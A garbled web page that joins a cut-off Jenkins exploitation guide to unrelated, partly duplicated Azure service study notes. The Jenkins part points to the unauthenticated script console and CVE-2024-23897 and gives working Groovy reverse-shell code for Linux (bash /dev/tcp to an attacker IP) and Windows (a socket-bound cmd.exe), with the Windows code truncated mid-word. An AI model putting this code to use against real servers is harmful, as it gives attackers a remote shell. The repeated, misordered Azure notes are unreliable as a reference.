Exploiting Jenkins / CVE-2024-23897 Often the script console is accessible without authentication due to misconfig on http://JENKINS_IP/script If you don't have access to script console and the version is vulnerable to CVE-2024-23897 , then exploit it to read files and get authentication credentials for Jenkins, (explained below) Groovy scripts can be executed from the script console. To get a reverse shell, execute the following script. For Linux, r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/YOUR_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() For Windows, String host="YOUR_IP"; int port=PORT; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStrea
Microsoft Azure Services and Resources #Index
Compute - Virtual machines, virtual machine scale sets, app services
Networking - virtual networks, load balancer, VPN gateway, application gateway, content delivery network
Storage - Blog, disk, file, archive storage and Azure Files
Databases - Cosmos DB, SQL Database, database migration service, SQL Data Warehouse
IoT - IoT Central, IoT Hub
Big Data - HDInsight, Data Lake Analytics
AI - Azure Machine Learning Service, Azure Machine Learning Studio
Serverless - Azure Functions, Logic Apps
Identity services - identity concepts, Azure Active Directory, Multi Factor Authentication concepts
Security products - including both the Azure Security Center, Information Protection, Advanced Threat Protection and security features in the product groups above, like Network Security Groups
Governance - including Policy and Role Based Access Control, but also compliance and privacy concepts.
Monitoring - Azure Monitor and Service Health
Azure tools - like Azure Resource Manager, Azure CLI, Cloud Shell and PowerShell
Azure Blueprints
This is a service that allows you to define a repeatable set of Azure resources.The definition of the Azure resources can adhere to an organization’s standards, patterns and requirements.Using blueprints , you can orchestrate the deployment of resources such as role assignments, policy assignments, Azure resource manager templates and resource groups.You can use blueprints to upgrade several subscriptions at once .
Azure Security Center
Storage - Blog, disk, file, archive storage and Azure Files
Databases - Cosmos DB, SQL Database, database migration service, SQL Data Warehouse
IoT - IoT Central, IoT Hub
Big Data - HDInsight, Data Lake Analytics
AI - Azure Machine Learning Service, Azure Machine Learning Studio
Serverless - Azure Functions, Logic Apps
Identity services - identity concepts, Azure Active Directory, Multi Factor Authentication concepts
Security products - including both the Azure Security Center, Information Protection, Advanced Threat Protection and security features in the product groups above, like Network Security Groups
Governance - including Policy and Role Based Access Control, but also compliance and privacy concepts.
Monitoring - Azure Monitor and Service Health
Azure tools - like Azure Resource Manager, Azure CLI, Cloud Shell and PowerShell
Azure Blueprints
This is a service that allows you to define a repeatable set of Azure resources.The definition of the Azure resources can adhere to an organization’s standards, patterns and requirements.Using blueprints , you can orchestrate the deployment of resources such as role assignments, policy assignments, Azure resource manager templates and resource groups.You can use blueprints to upgrade several subscriptions at once .
Azure Security Center
- This is an infrastructure security management system.
- You can use this tool to improve the security of your Azure based resources and on-premise resources as well.
- Azure Security Center has in-built support for services such as Azure virtual machines , Function Apps, Azure SQL Server databases.
- You can also allow Azure Security Center to give recommendations on what to do for on-premise Windows and Linux servers.
- On these servers, you need to ensure you install the Microsoft Monitoring agent.
- This service also helps detect and prevent threats at an Infrastructure layer
Azure AD Identity Protection
This is a service that can help detect suspicious actions related to user identities and add more security to the sign-ins to your Azure AD Account.
It can help in detecting the following,
Azure AD Privileged Identity Management
This is a service that can help manage, control and monitor access to important resources in your organization. With this service, you can provide just-in-time privileged access to Azure AD and Azure resources.
- Users with leaked credentials
- Sign-ins from anonymous IP addresses
- Sign-ins from infected devices
- Sign-ins from IP addresses with suspicious activity
- Sign-ins from unfamiliar locations
- Impossible travel to atypical locations
Azure AD Privileged Identity Management
This is a service that can help manage, control and monitor access to important resources in your organization. With this service, you can provide just-in-time privileged access to Azure AD and Azure resources.
- Provide time-bound access to resources using start and end dates.
- Enforce multi-factor authentication to activate any role.
- Get notifications when privileged roles are activated.
- Conduct access reviews to ensure users still require the roles.